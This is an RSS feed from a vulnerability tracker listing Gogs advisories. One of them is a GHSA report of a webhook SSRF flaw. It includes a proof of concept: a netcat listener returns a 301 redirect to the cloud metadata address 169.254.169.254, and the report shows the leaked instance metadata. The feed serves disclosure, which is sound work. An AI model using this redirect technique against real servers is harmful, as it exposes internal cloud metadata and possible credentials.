<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 03 Oct 2026 08:43:15 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-330138</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-330138</link>
      <description>EUVD-2026-330138</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-330138</guid>
    </item>
    <item>
      <title>fkie_cve-2026-47267</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-47267</link>
      <description>&lt;p&gt;Gogs is an open source self-hosted Git service. Prior to 0.14.3, the fix for CVE-2022-1285 prevents adding webooks or running webhooks with URLs with a hostname that resolves in localCIDRs. However, webhooks still follow redirects allowing to access hostname inside localCIDRs. This vulnerability is fixed in 0.14.3.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Gogs is an open source self-hosted Git service. Prior to 0.14.3, the fix for CVE-2022-1285 prevents adding webooks or running webhooks with URLs with a hostname that resolves in localCIDRs. However, webhooks still follow redirects allowing to access hostname inside localCIDRs. This vulnerability is fixed in 0.14.3.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-47267</guid>
    </item>
    <item>
      <title>GHSA-c4v7-xg93-qf8g — Gogs has SSRF in webhook deliveries</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-c4v7-xg93-qf8g</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: gogs.io/gogs&lt;/p&gt;
&lt;p&gt;### Summary
The fix for  CVE-2022-1285 prevents adding webooks or running webhooks with URLs with a hostname that resolves in localCIDRs. However, webhooks still follow redirects allowing to access hostname inside localCIDRs.&lt;/p&gt;
&lt;p&gt;This was already communicated in the initial report but it looks like there was a bit of a miscommunication.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;By creating a webook pointing to any URL that will return the following:&lt;/p&gt;
&lt;p&gt;```
HTTP/1.1 301 Moved Permanently
Location: http://169.254.169.254/metadata/v1.json
Content-Length: 0
Connection: close
```
It is possible to access 169.254.169.254&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;1. Run netcat on any server
2. Use this server as the webhook URL
3. Once you get the request from the webhook (for example by testing it), copy the response above&lt;/p&gt;
&lt;p&gt;Results from running this on try.gogs:&lt;/p&gt;
&lt;p&gt;```
{&amp;#34;droplet_id&amp;#34;:456901166,&amp;#34;hostname&amp;#34;:&amp;#34;gogs-do-nyc3-01&amp;#34;,&amp;#34;vendor_data&amp;#34;:&amp;#34;Content-Type: multipart/mixed; boundary=\&amp;#34;===============8645434374073493512==\&amp;#34;\nMIME-Version: 1.0\n\n--===============8645434374073493512==\nMIME-Version: 1.0\nContent-Type: text/cloud-config; charset=\&amp;#34;us-ascii\&amp;#34;\nContent-Transfer-Encoding: 7bit\nContent-Disposition: attachment; filename=\&amp;#34;cloud-config\&amp;#34;\n\n#cloud-config\n\n# Enable root and password auth\ndisable_roo...{&amp;#34;dhcp_enabled&amp;#34;:false,&amp;#34;vpc_peering_enabled&amp;#34;:false},&amp;#34;dotty_status&amp;#34;:&amp;#34;running&amp;#34;,&amp;#34;ssh_info&amp;#34;:{&amp;#34;port&amp;#34;:22}}
```&lt;/p&gt;
&lt;p&gt;### Impact
Server Side Request Forgery&lt;/p&gt;
&lt;p&gt;### Fix&lt;/p&gt;
&lt;p&gt;The &amp;#34;simplest way&amp;#34; to fix it is most likely to leverage Client.CheckRedirect https://pkg.go.…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: gogs.io/gogs&lt;/p&gt;
&lt;p&gt;### Summary
The fix for  CVE-2022-1285 prevents adding webooks or running webhooks with URLs with a hostname that resolves in localCIDRs. However, webhooks still follow redirects allowing to access hostname inside localCIDRs.&lt;/p&gt;
&lt;p&gt;This was already communicated in the initial report but it looks like there was a bit of a miscommunication.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;By creating a webook pointing to any URL that will return the following:&lt;/p&gt;
&lt;p&gt;```
HTTP/1.1 301 Moved Permanently
Location: http://169.254.169.254/metadata/v1.json
Content-Length: 0
Connection: close
```
It is possible to access 169.254.169.254&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;1. Run netcat on any server
2. Use this server as the webhook URL
3. Once you get the request from the webhook (for example by testing it), copy the response above&lt;/p&gt;
&lt;p&gt;Results from running this on try.gogs:&lt;/p&gt;
&lt;p&gt;```
{&amp;#34;droplet_id&amp;#34;:456901166,&amp;#34;hostname&amp;#34;:&amp;#34;gogs-do-nyc3-01&amp;#34;,&amp;#34;vendor_data&amp;#34;:&amp;#34;Content-Type: multipart/mixed; boundary=\&amp;#34;===============8645434374073493512==\&amp;#34;\nMIME-Version: 1.0\n\n--===============8645434374073493512==\nMIME-Version: 1.0\nContent-Type: text/cloud-config; charset=\&amp;#34;us-ascii\&amp;#34;\nContent-Transfer-Encoding: 7bit\nContent-Disposition: attachment; filename=\&amp;#34;cloud-config\&amp;#34;\n\n#cloud-config\n\n# Enable root and password auth\ndisable_roo...{&amp;#34;dhcp_enabled&amp;#34;:false,&amp;#34;vpc_peering_enabled&amp;#34;:false},&amp;#34;dotty_status&amp;#34;:&amp;#34;running&amp;#34;,&amp;#34;ssh_info&amp;#34;:{&amp;#34;port&amp;#34;:22}}
```&lt;/p&gt;
&lt;p&gt;### Impact
Server Side Request Forgery&lt;/p&gt;
&lt;p&gt;### Fix&lt;/p&gt;
&lt;p&gt;The &amp;#34;simplest way&amp;#34; to fix it is most likely to leverage Client.CheckRedirect https://pkg.go.…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-c4v7-xg93-qf8g</guid>
    </item>
    <item>
      <title>WID-SEC-W-2026-2013 — Gogs: Mehrere Schwachstellen</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-2013</link>
      <description>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in Gogs ausnutzen, um erweiterte Berechtigungen zu erlangen, beliebigen Code auszuführen – sogar mit erweiterten Berechtigungen, was zur vollständigen Kontrolle über das System führen kann –, Sicherheitsmaßnahmen zu umgehen, Daten zu manipulieren, Cross-Site-Scripting-Angriffe durchzuführen, Benutzer auf bösartige Websites umzuleiten oder einen Denial-of-Service-Zustand zu verursachen.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in Gogs ausnutzen, um erweiterte Berechtigungen zu erlangen, beliebigen Code auszuführen – sogar mit erweiterten Berechtigungen, was zur vollständigen Kontrolle über das System führen kann –, Sicherheitsmaßnahmen zu umgehen, Daten zu manipulieren, Cross-Site-Scripting-Angriffe durchzuführen, Benutzer auf bösartige Websites umzuleiten oder einen Denial-of-Service-Zustand zu verursachen.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2026-2013</guid>
    </item>
  </channel>
</rss>
